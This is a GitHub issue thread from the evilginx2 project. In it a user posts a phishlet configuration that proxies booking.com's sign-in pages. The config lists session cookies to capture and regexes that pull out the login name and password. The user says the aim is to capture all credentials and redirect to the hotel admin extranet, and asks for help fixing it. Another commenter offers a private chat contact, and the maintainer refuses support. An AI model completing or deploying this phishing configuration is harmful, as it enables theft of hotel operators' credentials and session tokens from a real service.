book.yaml - Githubissues

gelabertdionisio432 commented 5 years ago

author: '@white_fi' min_ver: '2.3.0' proxy_hosts:

{phish_sub: 'www', orig_sub: 'account', domain: 'booking.com', session: true, is_landing: true}
{phish_sub: '', orig_sub: '', domain: 'booking.com', session: true, is_landing: false}
{phish_sub: 'q', orig_sub: 'q', domain: 'bstatic.com', session: true, is_landing: false}
{phish_sub: 'saa', orig_sub: 'saa', domain: 'booking.com', session: true, is_landing: false} sub_filters:
{triggers_on: 'account.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
{triggers_on: 'account.booking.com', orig_sub: 'www', domain: 'booking.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
{triggers_on: 'saa.booking.com', orig_sub: 'saa', domain: 'booking.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
{triggers_on: 'saa.booking.com', orig_sub: 'saa', domain: 'booking.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
{triggers_on: 'q.bstatic.com', orig_sub: 'q', domain: 'q.bstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']} auth_tokens:
domain: '.booking.com' keys: ['bkng_bfp','ecid','hauavc','bkng_iam_rt','esadm','ecc','ece'] credentials: username: key: '' search: '"login_name":"([^"])' type: 'json' password: key: '' search: '"password":"([^"])' type: 'json' login: domain: 'account.booking.com' path: '/sign-in?op_token=EgVvYXV0aCJSChQ2Wjcyb0hPZDM2Tm43emszcGlyaBIJYXV0aG9yaXplGhpodHRwczovL2FkbWluLmJvb2tpbmcuY29tLyoNeyJwYWdlIjpudWxsfUIEY29kZSoIMI6H0ZzzmSM'

after i put the username and password i will like to move here : https://admin.booking.com/hotel/hoteladmin/extranet_ng/manage/home.html?

and want to capture all credentials

What i doing wrong?

lofthotel commented 5 years ago

Please add for talk

salamalecu@jabber.ru

kgretzky commented 5 years ago

This is not a support channel for creating phishlets. Kthxbye.

kgretzky / evilginx2

book.yaml #265